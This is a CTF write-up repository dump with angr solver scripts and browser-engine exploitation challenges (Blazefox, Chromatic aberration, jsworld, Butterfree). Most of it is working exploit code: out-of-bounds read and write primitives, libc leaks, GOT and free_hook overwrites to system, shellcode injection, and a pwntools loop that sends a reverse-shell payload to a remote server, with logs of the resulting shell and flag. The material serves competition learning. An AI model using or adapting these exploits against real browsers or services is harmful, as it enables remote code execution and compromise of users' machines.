(0x401084,0x4010C6) # The addresses of explosions 7 | 8 | 9 | proj = angr.Project('./bomb', load_options={'auto_load_libs':False}) # load the binary 10 | 11 | state = proj.factory.blank_state(addr=start) # Create the path 12 | password_addr = 0x100 # The arbitrary address of the string 13 | password_lenght = 6 # The lenght of the string 14 | password = state.se.BVS('password', password_lenght*8) #We create the symbolic bitvector string 15 | 16 | state.memory.store(password_addr, password) # We store the BVS at the arbitrary address 17 | 18 | # We set the constraint of printable chars to the input. 19 | for i in xrange(password_lenght): 20 | m = state.memory.load(password_addr + i, 1) 21 | state.add_constraints(m >= 0x20) 22 | state.add_constraints(m <= '}') 23 | 24 | # We put the strings in register 25 | state.regs.rdi = password_addr 26 | 27 | # Create and explore the function 28 | path = proj.factory.path_group(state) 29 | ex = path.explore(find=end, avoid=explode) 30 | 31 | if ex.found: 32 | found = ex.found[0].state 33 | 34 | res = found.se.any_str(password) # Print the result string 35 | 36 | print(res) 37 | -------------------------------------------------------------------------------- /angr/cmu_bomb_lab_ref/bomb_layer_4.py: -------------------------------------------------------------------------------- 1 | import angr 2 | 3 | 4 | #can be start at 40102c rather than 1029 5 | #because it is jmp step 6 | #.text:0000000000401029 cmp eax, 2 7 | #.text:000000000040102C jnz short loc_401035 8 | #start = 0x401029 9 | start = 0x40100c #the start point of the function,but slower 10 | #start = 0x400f0a # Where the path begin 11 | end = 0x40105D # Where we want to go 12 | explode = (0x401035,0x401058) # The addresses of explosions 13 | 14 | proj = angr.Project('./bomb', load_options={'auto_load_libs':False}) # load the binary 15 | 16 | state = proj.factory.blank_state(addr=start) # Create the path 17 | 18 | # Push the 2 digit returned by our scanf. 19 | for i in xrange(2): 20 | state.stack_push(state.se.BVS('int_{}'.format(i), 4*8)) 21 | 22 | # Create and explore the function 23 | path = proj.factory.path_group(state) 24 | ex = path.explore(find=end, avoid=explode) 25 | 26 | if ex.found: 27 | found = ex.found[0].state 28 | 29 | answer = [] 30 | 31 | # Pop 3 64bit integer from the stack 32 | # we will convert it to 32 bit values 33 | # 1 64bit integer is 2 number 34 | # pop 3 mean out put 6 35 | for x in xrange(3): 36 | curr_int = found.se.any_int(found.stack_pop()) 37 | 38 | answer.append(str(curr_int & 0xffffffff)) 39 | answer.append(str(curr_int >> 32)) 40 | 41 | print(" ".join(answer)) -------------------------------------------------------------------------------- /angr/cmu_bomb_lab_ref/readme.md: -------------------------------------------------------------------------------- 1 | obtained all addr while re-do the exmple 2 | 3 | Reference:http://pandhack.tk/posts/cmu-binary-bomb 4 | -------------------------------------------------------------------------------- /angr/readme.md: -------------------------------------------------------------------------------- 1 | Angr for dummies 2 | ======== 3 | 4 | This repo is mainly serve as a reference for using angr scripting. 5 | 6 | The code is copy from internet,and extra comment and image is added to it for reference. 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | Useful Link: 15 | ========== 16 | 17 | 18 | [angr io](https://docs.angr.io/) 19 | 20 | [basic](https://github.com/wwkenwong/angr-doc/blob/master/docs/toplevel.md) 21 | 22 | [angr api](http://angr.io/api-doc/) 23 | 24 | -------------------------------------------------------------------------------- /angr_type/Defcon_crackme1/crackme1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/angr_type/Defcon_crackme1/crackme1 -------------------------------------------------------------------------------- /angr_type/Defcon_crackme1/readme.md: -------------------------------------------------------------------------------- 1 | use IDAPRO 2 | 3 | u can see the process map 4 | 5 | jump to sub_c6c 6 | 7 | from rbp+1,rbp+2 8 | 9 | we can think it as a char array 10 | 11 | use ascii table, we can view it 12 | 13 | http://asiagaming.tistory.com/24 14 | 15 | 16 | http://www.asciitable.com/index/asciifull.gif 17 | -------------------------------------------------------------------------------- /browser/34C3_V9/readme.md: -------------------------------------------------------------------------------- 1 | # 2 | 3 | 4 | 5 | # Reference 6 | 7 | 1. [pctf v8 分析](http://blog.leanote.com/post/mut3p1g/pctf-v8-%E5%88%86%E6%9E%90) 8 | 9 | 2. [v8 exploit入门](https://xz.aliyun.com/t/5190) 10 | -------------------------------------------------------------------------------- /browser/Blaze_CTF_2018_blazefox/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/Blaze_CTF_2018_blazefox/1.png -------------------------------------------------------------------------------- /browser/Blaze_CTF_2018_blazefox/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/Blaze_CTF_2018_blazefox/2.png -------------------------------------------------------------------------------- /browser/Blaze_CTF_2018_blazefox/2_labelled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/Blaze_CTF_2018_blazefox/2_labelled.png -------------------------------------------------------------------------------- /browser/Blaze_CTF_2018_blazefox/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/Blaze_CTF_2018_blazefox/3.png -------------------------------------------------------------------------------- /browser/Blaze_CTF_2018_blazefox/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/Blaze_CTF_2018_blazefox/4.png -------------------------------------------------------------------------------- /browser/Blaze_CTF_2018_blazefox/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/Blaze_CTF_2018_blazefox/5.png -------------------------------------------------------------------------------- /browser/Blaze_CTF_2018_blazefox/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/Blaze_CTF_2018_blazefox/6.png -------------------------------------------------------------------------------- /browser/Blaze_CTF_2018_blazefox/README.txt: -------------------------------------------------------------------------------- 1 | This is a standard build of firefox nightly pulled on 4/6. 2 | 3 | How it was built: 4 | Following https://developer.mozilla.org/en-US/docs/Mozilla/Developer_guide/Build_Instructions/Simple_Firefox_build/Linux_and_MacOS_build_preparation 5 | 6 | python bootstrap.py 7 | hg clone https://hg.mozilla.org/mozilla-central 8 | hg checkout ee6283795f41 9 | hg import blaze.patch --no-commit 10 | ./mach build 11 | 12 | The larger download contains the built firefox and the docker env. 13 | 14 | We run it in the docker container with 15 | /firefox/dist/bin/firefox --headless 16 | The container has a profile to disable sandboxing, you're welcome 17 | 18 | The flag is in /flag in the container. 19 | 20 | -------------------------------------------------------------------------------- /browser/Blaze_CTF_2018_blazefox/blaze.patch: -------------------------------------------------------------------------------- 1 | diff -r ee6283795f41 js/src/builtin/Array.cpp 2 | --- a/js/src/builtin/Array.cpp Sat Apr 07 00:55:15 2018 +0300 3 | +++ b/js/src/builtin/Array.cpp Sun Apr 08 00:01:23 2018 +0000 4 | @@ -192,6 +192,20 @@ 5 | return ToLength(cx, value, lengthp); 6 | } 7 | 8 | +static MOZ_ALWAYS_INLINE bool 9 | +BlazeSetLengthProperty(JSContext* cx, HandleObject obj, uint64_t length) 10 | +{ 11 | + if (obj->is()) { 12 | + obj->as().setLengthInt32(length); 13 | + obj->as().setCapacityInt32(length); 14 | + obj->as().setInitializedLengthInt32(length); 15 | + return true; 16 | + } 17 | + return false; 18 | +} 19 | + 20 | + 21 | + 22 | /* 23 | * Determine if the id represents an array index. 24 | * 25 | @@ -1578,6 +1592,23 @@ 26 | return DenseElementResult::Success; 27 | } 28 | 29 | +bool js::array_blaze(JSContext* cx, unsigned argc, Value* vp) 30 | +{ 31 | + CallArgs args = CallArgsFromVp(argc, vp); 32 | + RootedObject obj(cx, ToObject(cx, args.thisv())); 33 | + if (!obj) 34 | + return false; 35 | + 36 | + if (!BlazeSetLengthProperty(cx, obj, 420)) 37 | + return false; 38 | + 39 | + //uint64_t l = obj.as().setLength(cx, 420); 40 | + 41 | + args.rval().setObject(*obj); 42 | + return true; 43 | +} 44 | + 45 | + 46 | // ES2017 draft rev 1b0184bc17fc09a8ddcf4aeec9b6d9fcac4eafce 47 | // 22.1.3.21 Array.prototype.reverse ( ) 48 | bool 49 | @@ -3511,6 +3542,8 @@ 50 | JS_FN("unshift", array_unshift, 1,0), 51 | JS_FNINFO("splice", array_splice, &array_splice_info, 2,0), 52 | 53 | + JS_FN("blaze", array_blaze, 0,0), 54 | + 55 | /* Pythonic sequence methods. */ 56 | JS_SELF_HOSTED_FN("concat", "ArrayConcat", 1,0), 57 | JS_INLINABLE_FN("slice", array_slice, 2,0, ArraySlice), 58 | diff -r ee6283795f41 js/src/builtin/Array.h 59 | --- a/js/src/builtin/Array.h Sat Apr 07 00:55:15 2018 +0300 60 | +++ b/js/src/builtin/Array.h Sun Apr 08 00:01:23 2018 +0000 61 | @@ -166,6 +166,9 @@ 62 | array_reverse(JSContext* cx, unsigned argc, js::Value* vp); 63 | 64 | extern bool 65 | +array_blaze(JSContext* cx, unsigned argc, js::Value* vp); 66 | + 67 | +extern bool 68 | array_splice(JSContext* cx, unsigned argc, js::Value* vp); 69 | 70 | extern const JSJitInfo array_splice_info; 71 | diff -r ee6283795f41 js/src/vm/ArrayObject.h 72 | --- a/js/src/vm/ArrayObject.h Sat Apr 07 00:55:15 2018 +0300 73 | +++ b/js/src/vm/ArrayObject.h Sun Apr 08 00:01:23 2018 +0000 74 | @@ -60,6 +60,14 @@ 75 | getElementsHeader()->length = length; 76 | } 77 | 78 | + void setCapacityInt32(uint32_t length) { 79 | + getElementsHeader()->capacity = length; 80 | + } 81 | + 82 | + void setInitializedLengthInt32(uint32_t length) { 83 | + getElementsHeader()->initializedLength = length; 84 | + } 85 | + 86 | // Make an array object with the specified initial state. 87 | static inline ArrayObject* 88 | createArray(JSContext* cx, 89 | -------------------------------------------------------------------------------- /browser/Blaze_CTF_2018_blazefox/pwn.js: -------------------------------------------------------------------------------- 1 | //double to int 2 | function d_to_i2(d){ 3 | var a = new Uint32Array(new Float64Array([d]).buffer); 4 | return [a[1], a[0]]; 5 | } 6 | 7 | //int to double 8 | function i2_to_d(x){ 9 | return new Float64Array(new Uint32Array([x[1], x[0]]).buffer)[0]; 10 | } 11 | 12 | function i2_to_hex(i2){ 13 | var v1 = ("00000000" + i2[0].toString(16)).substr(-8); 14 | var v2 = ("00000000" + i2[1].toString(16)).substr(-8); 15 | return [v1,v2]; 16 | } 17 | function p_i2(d){ 18 | print(i2_to_hex(d_to_i2(d))[0]+i2_to_hex(d_to_i2(d))[1]) 19 | 20 | } 21 | 22 | function debug_log(x){ 23 | return console.log("[DEBUG] "+x) 24 | } 25 | 26 | function hex(i2){ 27 | return "0x" + ("00000000" + i2[0].toString(16)).slice(-8) + ("00000000" + i2[1].toString(16)).slice(-8); 28 | } 29 | 30 | var oob_Array=new Array(1) 31 | oob_Array[0]=0x71717171 32 | 33 | var uint32_Array=new Uint32Array(0x2000) 34 | for(var i=0; i<0x2000; i=i+1) {uint32_Array[i]=0x4141414141} 35 | 36 | oob_Array.blaze() 37 | 38 | //find the function size tag(0x2000) from the oob array 39 | uint32_baseaddress_offset=0 40 | for (i=0; i<0x2000; i++) 41 | { 42 | if(oob_Array[i]==0x2000) 43 | { 44 | print('uInt32Array found'); 45 | uint32_baseaddress_offset=i+2 46 | break; 47 | } 48 | } 49 | // array address of the original object 50 | // overwrite for arbitary oob 51 | console.log("address of the buffer") 52 | p_i2(oob_Array[uint32_baseaddress_offset]); 53 | // emptyelelement header 54 | // use for de PIE 55 | console.log("address of emptyelement") 56 | p_i2(oob_Array[uint32_baseaddress_offset-4]); 57 | 58 | 59 | 60 | 61 | //read memory content 62 | function read64(addr){ 63 | console.log(addr); 64 | oob_Array[uint32_baseaddress_offset]=i2_to_d(addr); 65 | // return the first two block of hex of the addr 66 | return [uint32_Array[1],uint32_Array[0]] 67 | } 68 | 69 | //write memory 70 | function write4(addr,value){ 71 | oob_Array[uint32_baseaddress_offset]=i2_to_d(addr); 72 | uint32_Array[0]=value[1]; 73 | uint32_Array[1]=value[0]; 74 | } 75 | 76 | //>>> hex(e.got["memmove"]) 77 | //'0x2354040' 78 | //>>> hex(e.got["system"]) 79 | //'0x23540b0' 80 | 81 | 82 | // on js shell, we just leak the no aslr memove 83 | // then calculate the offset 84 | // dont know why it did not call memmove in headless mode 85 | fopen_got=[0,0x2354050] 86 | fopen_leak=read64(fopen_got); 87 | console.log("leaked fopen"); 88 | debug_log(fopen_leak) 89 | print(hex(fopen_leak)) 90 | //libc from system libc 91 | 92 | libc_base= [fopen_leak[0],fopen_leak[1]-0x6dd70] 93 | system =[libc_base[0],libc_base[1]+0x45390] 94 | 95 | //trick from saelo 96 | var target = new Uint8Array(100); 97 | var cmd = "id;xcalc"; 98 | for (var i = 0; i < cmd.length; i++) { 99 | target[i] = cmd.charCodeAt(i); 100 | } 101 | // got hijacking 102 | memmove_got=[0,0x2354040] 103 | write4(memmove_got,system) 104 | 105 | 106 | //shell 107 | console.log("[+] PWNED") 108 | target.copyWithin(0,1) 109 | 110 | -------------------------------------------------------------------------------- /browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/1.jpg -------------------------------------------------------------------------------- /browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/2.jpg -------------------------------------------------------------------------------- /browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/3.jpg -------------------------------------------------------------------------------- /browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/6d87044f837a59e649f6d799143aede299a3103e764f8c46c921c3ee16da773a_chromatic_aberration.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/6d87044f837a59e649f6d799143aede299a3103e764f8c46c921c3ee16da773a_chromatic_aberration.7z -------------------------------------------------------------------------------- /browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/pwn_no_comment.js: -------------------------------------------------------------------------------- 1 | function gc() { for (let i = 0; i < 0x10; i++) new ArrayBuffer(0x1000000);} 2 | 3 | var tarr = new BigUint64Array(8); 4 | tarr[0] = 0x33313131n; 5 | tarr[1] = 0x32323232n; 6 | 7 | var ab = [] 8 | for (var i = 0; i < 0x200; i++) {ab.push(new ArrayBuffer(0x1337));} 9 | var oob_str_arr = ['AAAAAAAA','BBBBBBBB','CCCCCCCC'] 10 | gc(); 11 | gc(); 12 | console.log('[+] Locate relative postion of tarr') 13 | 14 | var tarr_ix = 0; 15 | for (var i = 0; i < 4000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0x33 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0x31& oob_str_arr[0].charCodeAt(-1620000-i-2) == 0x31& oob_str_arr[0].charCodeAt(-1620000-i-3) == 0x31){tarr_ix=i;};} 16 | console.log(tarr_ix); 17 | console.log('[+] Locate array buffer') 18 | 19 | var ab_ix = 0; 20 | for (var i = 0; i < 4000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0x13 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0x37){ab_ix=i;};} 21 | 22 | 23 | console.log(ab_ix); 24 | 25 | diff = 650 26 | tarr.fill(0x4000n,Math.floor(diff/8)-1,Math.floor(diff/8)); 27 | 28 | var corrupted_ix = 0; 29 | 30 | for (var i = 0; i < 0x200; i++){if (ab[i].byteLength!=0x1337){corrupted_ix =i;}}; 31 | 32 | 33 | var leak_base_offset = 0x1e90n 34 | var base_offset = 0x7fe2f0n 35 | var cxa = 0x1474718n 36 | 37 | 38 | var up_byte = 0; 39 | var lo_byte = 0; 40 | 41 | for (var i = 0; i < 10000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0& oob_str_arr[0].charCodeAt(-1620000-i-2) == 0& oob_str_arr[0].charCodeAt(-1620000-i-3) == 7& oob_str_arr[0].charCodeAt(-1620000-i+1) >0& oob_str_arr[0].charCodeAt(-1620000-i+2) >0) {up_byte = oob_str_arr[0].charCodeAt(-1620000-i+2); lo_byte = oob_str_arr[0].charCodeAt(-1620000-i+1) ; break;}} 42 | 43 | 44 | var addr_space = BigInt(0x100000000*(lo_byte+(up_byte*0x100))); 45 | 46 | console.log(addr_space) 47 | 48 | var leak_base = addr_space+leak_base_offset 49 | tarr.fill(leak_base,Math.floor(diff/8),Math.floor(diff/8)+1); 50 | var b64 = new BigUint64Array(ab[corrupted_ix]) 51 | 52 | var bin_base = b64[0] - base_offset 53 | console.log(bin_base) 54 | 55 | var cxa_handler = bin_base+cxa 56 | 57 | console.log(cxa_handler) 58 | 59 | tarr.fill(cxa_handler,Math.floor(diff/8),Math.floor(diff/8)+1); 60 | var b64 = new BigUint64Array(ab[corrupted_ix]) 61 | gi_abort = b64[0] 62 | local = 0x406c0n 63 | libc_base = gi_abort-local 64 | free_hook = libc_base + 0x3ed8e8n 65 | system = libc_base + 0x4f440n 66 | tarr.fill(free_hook,Math.floor(diff/8),Math.floor(diff/8)+1); 67 | 68 | var b64 = new BigUint64Array(ab[corrupted_ix]) 69 | 70 | b64[0] = system 71 | console.log('sh') 72 | 73 | -------------------------------------------------------------------------------- /browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/pwn_with_logs.js: -------------------------------------------------------------------------------- 1 | function gc() { for (let i = 0; i < 0x10; i++) new ArrayBuffer(0x1000000);} 2 | 3 | var tarr = new BigUint64Array(8); 4 | tarr[0] = 0x33313131n; 5 | tarr[1] = 0x32323232n; 6 | 7 | var ab = [] 8 | for (var i = 0; i < 0x200; i++) {ab.push(new ArrayBuffer(0x1337));} 9 | var oob_str_arr = ['AAAAAAAA','BBBBBBBB','CCCCCCCC'] 10 | gc(); 11 | gc(); 12 | console.log('[+] Locate relative postion of tarr') 13 | 14 | var tarr_ix = 0; 15 | for (var i = 0; i < 4000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0x33 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0x31& oob_str_arr[0].charCodeAt(-1620000-i-2) == 0x31& oob_str_arr[0].charCodeAt(-1620000-i-3) == 0x31){tarr_ix=i;};} 16 | console.log(tarr_ix); 17 | console.log('[+] Locate array buffer') 18 | 19 | var ab_ix = 0; 20 | for (var i = 0; i < 4000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0x13 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0x37){ab_ix=i;};} 21 | 22 | 23 | console.log(ab_ix); 24 | 25 | // 650 is the threshold calculate from running the code in debugger 26 | // weird 27 | diff = 650//tarr_ix-ab_ix; 28 | console.log('[+] Difference : ') 29 | console.log(diff) 30 | 31 | 32 | tarr.fill(0x4000n,Math.floor(diff/8)-1,Math.floor(diff/8)); 33 | 34 | var corrupted_ix = 0; 35 | 36 | console.log('[+] Now we corrupted one of the array size :)') 37 | for (var i = 0; i < 0x200; i++){if (ab[i].byteLength!=0x1337){corrupted_ix =i;}}; 38 | 39 | 40 | var leak_base_offset = 0x1e90n 41 | var base_offset = 0x7fe2f0n 42 | var cxa = 0x1474718n 43 | 44 | console.log('[+] Next we leak the mapped base ') 45 | 46 | 47 | var up_byte = 0; 48 | var lo_byte = 0; 49 | 50 | for (var i = 0; i < 10000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0& oob_str_arr[0].charCodeAt(-1620000-i-2) == 0& oob_str_arr[0].charCodeAt(-1620000-i-3) == 7& oob_str_arr[0].charCodeAt(-1620000-i+1) >0& oob_str_arr[0].charCodeAt(-1620000-i+2) >0) {up_byte = oob_str_arr[0].charCodeAt(-1620000-i+2); lo_byte = oob_str_arr[0].charCodeAt(-1620000-i+1) ; break;}} 51 | 52 | 53 | var addr_space = BigInt(0x100000000*(lo_byte+(up_byte*0x100))); 54 | 55 | console.log(addr_space) 56 | 57 | var leak_base = addr_space+leak_base_offset 58 | tarr.fill(leak_base,Math.floor(diff/8),Math.floor(diff/8)+1); 59 | var b64 = new BigUint64Array(ab[corrupted_ix]) 60 | 61 | var bin_base = b64[0] - base_offset 62 | console.log(bin_base) 63 | 64 | var cxa_handler = bin_base+cxa 65 | 66 | console.log(cxa_handler) 67 | 68 | tarr.fill(cxa_handler,Math.floor(diff/8),Math.floor(diff/8)+1); 69 | var b64 = new BigUint64Array(ab[corrupted_ix]) 70 | gi_abort = b64[0] 71 | local = 0x406c0n 72 | remote = 0x25414n 73 | libc_base = gi_abort-local 74 | free_hook = libc_base + 0x3ed8e8n // 0x1e75a8 75 | system = libc_base + 0x4f440n // 0x52fd0 76 | tarr.fill(free_hook,Math.floor(diff/8),Math.floor(diff/8)+1); 77 | 78 | var b64 = new BigUint64Array(ab[corrupted_ix]) 79 | b64[0] = system 80 | console.log('sh') 81 | -------------------------------------------------------------------------------- /browser/CONFidence_CTF_2020_Teaser_Chromatic_aberration/solved.js: -------------------------------------------------------------------------------- 1 | function gc() { for (let i = 0; i < 0x10; i++) new ArrayBuffer(0x1000000);};var tarr = new BigUint64Array(8);tarr[0] = 0x33313131n;tarr[1] = 0x32323232n;var ab = [];for (var i = 0; i < 0x200; i++) {ab.push(new ArrayBuffer(0x1337));};var oob_str_arr = ['AAAAAAAA','BBBBBBBB','CCCCCCCC'];gc();gc();var tarr_ix = 0;for (var i = 0; i < 4000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0x33 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0x31& oob_str_arr[0].charCodeAt(-1620000-i-2) == 0x31& oob_str_arr[0].charCodeAt(-1620000-i-3) == 0x31){tarr_ix=i;};};var ab_ix = 0;for (var i = 0; i < 4000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0x13 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0x37){ab_ix=i;};};diff = 650;tarr.fill(0x4000n,Math.floor(diff/8)-1,Math.floor(diff/8));var corrupted_ix = 0; 2 | for (var i = 0; i < 0x200; i++){if (ab[i].byteLength!=0x1337){corrupted_ix =i;};};var leak_base_offset = 0x1e90n; var base_offset = 0x7fe2f0n; var cxa = 0x1474718n;var up_byte = 0;var lo_byte = 0;for (var i = 0; i < 10000; i++) { if(oob_str_arr[0].charCodeAt(-1620000-i) == 0 & oob_str_arr[0].charCodeAt(-1620000-i-1) == 0& oob_str_arr[0].charCodeAt(-1620000-i-2) == 0& oob_str_arr[0].charCodeAt(-1620000-i-3) == 7& oob_str_arr[0].charCodeAt(-1620000-i+1) >0& oob_str_arr[0].charCodeAt(-1620000-i+2) >0) {up_byte = oob_str_arr[0].charCodeAt(-1620000-i+2); lo_byte = oob_str_arr[0].charCodeAt(-1620000-i+1) ; break;};};var addr_space = BigInt(0x100000000*(lo_byte+(up_byte*0x100))); var leak_base = addr_space+leak_base_offset;tarr.fill(leak_base,Math.floor(diff/8),Math.floor(diff/8)+1);var b64 = new BigUint64Array(ab[corrupted_ix]);var bin_base = b64[0] - base_offset;var cxa_handler = bin_base+cxa;tarr.fill(cxa_handler,Math.floor(diff/8),Math.floor(diff/8)+1);var b64 = new BigUint64Array(ab[corrupted_ix]);gi_abort = b64[0];remote = 0x25414n;libc_base = gi_abort-remote;free_hook=libc_base+0x1e75a8n;system=libc_base+0x52fd0n;tarr.fill(free_hook,Math.floor(diff/8),Math.floor(diff/8)+1);var b64 = new BigUint64Array(ab[corrupted_ix]);console.log('run shell');b64[0] = system;console.log('sh'); 3 | 4 | 5 | /* 6 | drwxr-xr-x 1 65534 65534 4096 Mar 13 19:26 . 7 | drwxrwxrwt 9 1000 1000 180 Mar 15 18:40 .. 8 | drwxr-xr-x 2 65534 65534 4096 Mar 13 19:26 bin 9 | -rwxr-xr-x 1 65534 65534 463 Mar 13 17:41 entrypoint.sh 10 | -rw-r--r-- 1 65534 65534 36 Mar 13 17:41 flagishere 11 | -rw-r--r-- 1 65534 65534 556 Mar 13 17:41 pow.py 12 | -rw-r--r-- 1 65534 65534 327 Mar 13 17:41 server.py 13 | pwd 14 | /app 15 | ls 16 | bin 17 | entrypoint.sh 18 | flagishere 19 | pow.py 20 | server.py 21 | cat flagishere 22 | p4{c0mPIling_chr@mium_1s_h4rd_ok?} 23 | */ 24 | -------------------------------------------------------------------------------- /browser/Codegate_CTF_2017_Preliminary_jsworld/fuzzer/a.js: -------------------------------------------------------------------------------- 1 | //double to int 2 | function d_to_i2(d){ 3 | var a = new Uint32Array(new Float64Array([d]).buffer); 4 | return [a[1], a[0]]; 5 | } 6 | 7 | //int to double 8 | function i2_to_d(x){ 9 | return new Float64Array(new Uint32Array([x[1], x[0]]).buffer)[0]; 10 | } 11 | 12 | function i2_to_hex(i2){ 13 | var v1 = ("00000000" + i2[0].toString(16)).substr(-8); 14 | var v2 = ("00000000" + i2[1].toString(16)).substr(-8); 15 | return [v1,v2]; 16 | } 17 | function p_i2(d){ 18 | print(i2_to_hex(d_to_i2(d))[0]+i2_to_hex(d_to_i2(d))[1]) 19 | 20 | } 21 | 22 | function debug_log(x){ 23 | return console.log("[DEBUG] "+x) 24 | } 25 | 26 | function hex(i2){ 27 | return "0x" + ("00000000" + i2[0].toString(16)).slice(-8) + ("00000000" + i2[1].toString(16)).slice(-8); 28 | } 29 | 30 | var oob_Array=new Array(1) 31 | oob_Array[0]=0x71717171 32 | 33 | var uint32_Array=new Uint32Array(0x1000) 34 | for(var i=0; i<0x1000; i=i+1) {uint32_Array[i]=0x4141414141} 35 | 36 | 37 | //trigger oob 38 | oob_Array.pop() 39 | oob_Array.pop() 40 | 41 | //find the function size tag(0x1337) from the oob array 42 | uint32_baseaddress_offset=0 43 | for (i=0; i<0x1337; i++) 44 | { 45 | if(oob_Array[i]==0x1000) 46 | { 47 | print('uInt32Array found'); 48 | uint32_baseaddress_offset=i+2 49 | break; 50 | } 51 | } 52 | // array address of the original object 53 | // overwrite for arbitary oob 54 | print("address of the buffer"); 55 | p_i2(oob_Array[uint32_baseaddress_offset]); 56 | print("location : "+uint32_baseaddress_offset); 57 | 58 | //jit 59 | function ss(arg){ 60 | print('NO SHELL') 61 | } 62 | for (i=0; i<0x20; i++){ 63 | ss(1) 64 | } 65 | 66 | 67 | 68 | //read memory content 69 | function read64(addr){ 70 | console.log(addr); 71 | oob_Array[uint32_baseaddress_offset]=i2_to_d(addr); 72 | // return the first two block of hex of the addr 73 | return [uint32_Array[1],uint32_Array[0]] 74 | } 75 | 76 | //write memory 77 | function write4(addr,value){ 78 | oob_Array[uint32_baseaddress_offset]=i2_to_d(addr); 79 | uint32_Array[0]=value[1]; 80 | uint32_Array[1]=value[0]; 81 | } 82 | 83 | function write(addr, data){ 84 | oob_Array[uint32_baseaddress_offset] = i2_to_d(addr); 85 | uint32_Array[0] = data; 86 | } 87 | 88 | function read(addr){ 89 | oob_Array[uint32_baseaddress_offset] = i2_to_d(addr); 90 | return uint32_Array[0] 91 | } 92 | 93 | 94 | 95 | function shellcodeInject(addr, shellcode){ 96 | var hex = ''; 97 | var shellcodeA=[] 98 | var c=0 99 | for(var i=0; ifastSlice(*exec, begin, end - begin)) 33 | @@ -1636,4 +1636,4 @@ 34 | globalObject->arraySpeciesWatchpoint().fireAll(vm, lazyDetail); 35 | } 36 | 37 | -} // namespace JSC 38 | +} // namespace JSC 39 | 40 | ``` 41 | 42 | If you have read saelo 's phrack article (http://www.phrack.org/papers/attacking_javascript_engines.html), you will spot it instantly it is CVE-2016-4622, just go to the phrack article and the git repo (https://github.com/saelo/jscpwn) get the PoC , change the size from 4 to 100 , and set it to return [4] instead of [3] 43 | 44 | Embed the addrof and fakeobj to 35c3 webkid 's exploit (https://github.com/saelo/35c3ctf/tree/master/WebKid), change shellcode in order to make it works on linux. 45 | 46 | For details, please refer to CVE-2016-4622 and 35c3 webkid 47 | 48 | I can get the shell locally but I tried more than 200 times send the payload to remote service and get the flag in one of the attempt, not sure with the reason. 49 | 50 | 51 | ![alt text](flag.png) 52 | -------------------------------------------------------------------------------- /browser/Codegate_CTF_2019_Preliminary_Butterfree/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ans = open('reverse_shell.js').read() 4 | while True: 5 | r= remote('110.10.147.110', 17423) 6 | # r = process('./jsc') 7 | # pause() 8 | r.sendline(ans) 9 | sleep(0.3) 10 | # sleep(2) 11 | try: 12 | r.sendline('ls -al ') 13 | r.recv() 14 | r.interactive() 15 | except EOFError: 16 | r.close() 17 | r.close() 18 | 19 | 20 | ''' 21 | [*] Interrupted 22 | [+] Opening connection to 110.10.147.110 on port 17423: Done 23 | [*] Switching to interactive mode 24 | [*] Got EOF while reading in interactive 25 | $ 26 | [*] Interrupted 27 | [+] Opening connection to 110.10.147.110 on port 17423: Done 28 | [*] Switching to interactive mode 29 | total 268 30 | drwxr-xr-x 1 root guest 4096 Jan 26 10:27 . 31 | 